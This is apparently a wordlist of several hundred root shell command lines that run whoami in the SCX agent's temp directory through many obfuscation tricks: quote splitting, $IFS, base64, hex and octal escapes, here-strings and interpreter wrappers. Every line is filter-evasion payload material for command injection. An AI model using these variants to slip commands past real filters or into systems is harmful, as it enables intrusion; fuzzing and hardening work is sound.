sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c '/whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c '/./whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w/hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w\\hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'wh""oami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'who""ami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoa""mi'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoa\mi'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w\hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'wh/oami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'wh.oami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'who\ami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami#'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'wh oami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'wh\t\oami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami </dev/null'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c '$(echo whoami)'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c '\w\h\o\a\m\i'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c '/bin///sh -c whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c \\"whoami\\""
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w$HOMEhoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w$IFS hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w$((1+1))hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w${USER}hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'who$(echo ami)'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'who\\a\\mi'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'wh`echo o`ami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w$((3-2))hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w\$hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami; :'“
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin//sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh/ -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoa''mi'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'wh''oami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w''hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami'''"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami# '"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami ;'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami :'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami\t'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami\n'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'who$IFSami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'wh$IFS oami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w${IFS}hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'who${IFS}ami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami </dev/null '"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c '$(printf whoami)'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c '`printf whoami`'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w$(echo h)oami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'who$(echo a)mi'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w$((1))hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w$((2-1))hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'who$((1+0))ami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w${PATH%%:*}hoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'who${PWD##*/}ami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'wh\\oami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'who\\ami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'w\\ho\\ami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c '/usr/bin/env whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'command whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh --command 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh --c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/bash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/zsh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && bash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && zsh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh --run 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh --execute 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh --exec 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh --script 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -x 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /usr/bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /usr/bin/bash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -e 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -s 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh --shell 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && env /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && eval /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && '/bin/sh' -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c \"whoami\""
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c \`whoami`"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && nohup /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && timeout 5 /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'echo $(whoami)'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'id -un'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh --rcfile /dev/null -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -l -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/dash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /usr/bin/dash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/busybox sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && busybox sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && env sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && env bash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/env sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/env bash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && command sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && command bash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && setsid sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && setsid /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && stdbuf -oL sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && stdbuf -oL /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && script -q -c 'whoami' /dev/null"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && script -q -c \"sh -c whoami\" /dev/null"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -lc 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && bash -lc 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -lc 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/bash -lc 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -ic 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && bash -ic 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -ic 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/bash -ic 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && SHELL=/bin/sh sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && SHELL=/bin/bash bash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && env SHELL=/bin/sh sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && env SHELL=/bin/bash bash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'printf %s $(whoami)'"
`sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'id -u -n'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /sh 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && bash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && bash 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bash 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && . /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && . /bin/sh 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec sh 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec /sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec /sh 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec /bin/sh 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -c whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && . sh -c whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh<<<whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && env sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && env /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /usr/bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /usr/bin/sh 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && nohup sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && nohup /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && setsid sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && setsid /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && command sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && command /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh<<<'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && . sh<<<whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh<<<$(echo whoami)"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && (sh -c whoami)"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh<<<whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && < /dev/null sh -c whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && </dev/null /bin/sh whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && eval sh whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && eval /bin/sh whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && (exec sh -c whoami)"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && time sh whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && nice sh whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -i -c whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh --noprofile -c whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh --norc -c whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && unalias sh; sh whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh < <(echo whoami)"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -c "$(echo whoami)""
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh <<< $(echo whoami)"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && cat<<<whoami|sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && cat<<<whoami|/bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo whoami|sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo whoami|/bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && read cmd<<<whoami; sh -c $cmd"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && for c in whoami; do sh -c $c; done"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && awk 'BEGIN{system("sh whoami")}'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && perl -e 'system(\"sh whoami\")'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && python3 -c 'import os; os.system(\"sh whoami\")'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -c \`echo whoami`"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && while read cmd; do sh -c $cmd; done<<<whoami"
sudo -u root sh -c "/bin/sh -c 'whoami' && cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "'whoami' -c /bin/sh && cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && whoami -c /bin/sh"
sudo -u root sh -c "/bin/sh -c 'cd /var/opt/microsoft/scx/tmp && whoami'"
sudo -u root sh -c "'cd /var/opt/microsoft/scx/tmp' && /bin/sh -c whoami"
sudo -u root sh -c "'cd /var/opt/microsoft/scx/tmp' && 'whoami' -c /bin/sh"
sudo -u root sh -c "whoami && /bin/sh -c 'cd /var/opt/microsoft/scx/tmp'"
sudo -u root sh -c "whoami && cd /var/opt/microsoft/scx/tmp && /bin/sh"
sudo -u root sh -c "'whoami' && cd /var/opt/microsoft/scx/tmp && /bin/sh"
sudo -u root sh -c "/bin/sh -c 'cd /var/opt/microsoft/scx/tmp' && whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp; whoami && /bin/sh"
sudo -u root sh -c "/bin/sh -c 'whoami'; cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp; /bin/sh -c 'whoami'"
sudo -u root sh -c "'cd /var/opt/microsoft/scx/tmp' -c /bin/sh && whoami"
sudo -u root sh -c "/bin/sh -c whoami && cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && whoami && /bin/sh"
sudo -u root sh -c "whoami && /bin/sh && cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp; /bin/sh && whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && '/bin/sh' -c whoami"
sudo -u root sh -c "whoami && (cd /var/opt/microsoft/scx/tmp && /bin/sh)"
sudo -u root sh -c "/bin/sh && cd /var/opt/microsoft/scx/tmp && whoami"
sudo -u root sh -c "/bin/sh -c whoami; cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "/bin/sh -c 'cd /var/opt/microsoft/scx/tmp' && echo whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo whoami | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh <<< 'whoami'"
sudo -u root sh -c "/bin/sh -c 'cd /var/opt/microsoft/scx/tmp'; whoami"
sudo -u root sh -c "whoami; /bin/sh -c 'cd /var/opt/microsoft/scx/tmp'"
sudo -u root sh -c "whoami; cd /var/opt/microsoft/scx/tmp; /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh && whoami"
sudo -u root sh -c "/bin/sh -c whoami && cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "whoami && cd /var/opt/microsoft/scx/tmp && /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp; whoami; /bin/sh"
sudo -u root sh -c "/bin/sh -c 'whoami'; cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp; /bin/sh -c whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec /bin/sh -c whoami"
sudo -u root sh -c "exec /bin/sh -c whoami && cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "/bin/sh -c whoami && cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp; exec /bin/sh -c whoami"
sudo -u root sh -c "/bin/sh -c whoami" && cd /var/opt/microsoft/scx/tmp
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp" && /bin/sh -c whoami
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh" -c whoami
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh" && whoami
sudo -u root sh -c "/bin/sh && cd /var/opt/microsoft/scx/tmp && whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp; whoami; exec /bin/sh"
sudo -u root sh -c "whoami && exec /bin/sh && cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "exec /bin/sh && whoami && cd /var/opt/microsoft/scx/tmp"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec /bin/sh; whoami"
sudo -u root sh -c "/bin/sh -c 'cd /var/opt/microsoft/scx/tmp' && exec whoami"
sudo -u root sh -c "exec whoami && cd /var/opt/microsoft/scx/tmp && /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && whoami" && /bin/sh
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp" && whoami && /bin/sh
sudo -u root sh -c "/bin/sh" && cd /var/opt/microsoft/scx/tmp && whoami
sudo -u root sh -c "whoami" && cd /var/opt/microsoft/scx/tmp && /bin/sh
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp" && exec /bin/sh -c whoami
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp" && /bin/sh -c 'exec whoami'
sudo -u root sh -c "/bin/sh -c 'exec whoami'" && cd /var/opt/microsoft/scx/tmp
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp" && exec whoami && /bin/sh
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp" && /bin/sh && exec whoami
sudo -u root sh -c "exec whoami" && /bin/sh && cd /var/opt/microsoft/scx/tmp
sudo -u root sh -c "exec /bin/sh -c 'cd /var/opt/microsoft/scx/tmp && whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c \$'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c \\$'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c $(echo whoami)"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c `echo whoami`"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo whoami | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && printf 'whoami\n' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo d2hvYW1p | base64 -d | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo 77686f616d69 | xxd -r -p | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && perl -e 'print \"whoami\"' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && python3 -c 'print(\"whoami\")' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo -e 'whoami' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && cat <<< 'whoami' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && eval $(echo whoami)"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && eval \$(printf whoami)"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo -n 'whoami' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && awk 'BEGIN{print \"whoami\"}' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo -ne '\\x77\\x68\\x6f\\x61\\x6d\\x69' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo -e '\x77\x68\x6f\x61\x6d\x69' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo 'whoami' | sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo whoami | env /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo \$'whoami' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo \$\"whoami\" | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && export CMD=whoami; echo \$CMD | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && for i in w h o a m i; do echo -n \$i; done | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo \$((0+119))\$((0+104))\$((0+111))\$((0+97))\$((0+109))\$((0+105)) | tr '\\0' '\\n' | awk '{printf \"%c\", \$1}' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo whoami | tee /dev/stderr | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && tail -c +1 <<< whoami | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && yes whoami | head -n1 | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/bash -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c $(echo d2hvYW1p | base64 -d)"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c $'w\\x68\\x6f\\x61\\x6d\\x69'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c $'\167\150\157\141\155\151'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c $'\x77\x68\x6f\x61\x6d\x69'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh -c $(printf '%s\n' whoami)"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && eval /bin/sh -c whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && /bin/sh<<<whoami"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && env /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && command /bin/sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec /bin/sh -c $(echo d2hvYW1pCg== | base64 -d)"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && nohup /bin/sh -c 'whoami' > /dev/null 2>&1 &"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && \x2fbin\x2fsh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && \057bin\057sh -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -c \x27\x77\x68\x6f\x61\x6d\x69\x27"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -c $'\167\150\157\141\155\151'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && sh -c \u0077\u0068\u006f\u0061\u006d\u0069"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && $(which sh) -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && $(echo /bin/sh) -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && perl -e 'exec \"/bin/sh\", \"-c\", \"whoami\"'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && python3 -c 'import os; os.system(\"whoami\")'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && printf '%s\n' whoami | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo d2hvYW1p | base64 -d | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo -e '\x77\x68\x6f\x61\x6d\x69' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo 'whoami' | /bin/sh"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && exec $(echo L2Jpbi9zaA== | base64 -d) -c 'whoami'"
sudo -u root sh -c "cd /var/opt/microsoft/scx/tmp && echo \u0077\u0068\u006f\u0061\u006d\u0069 | /bin/sh"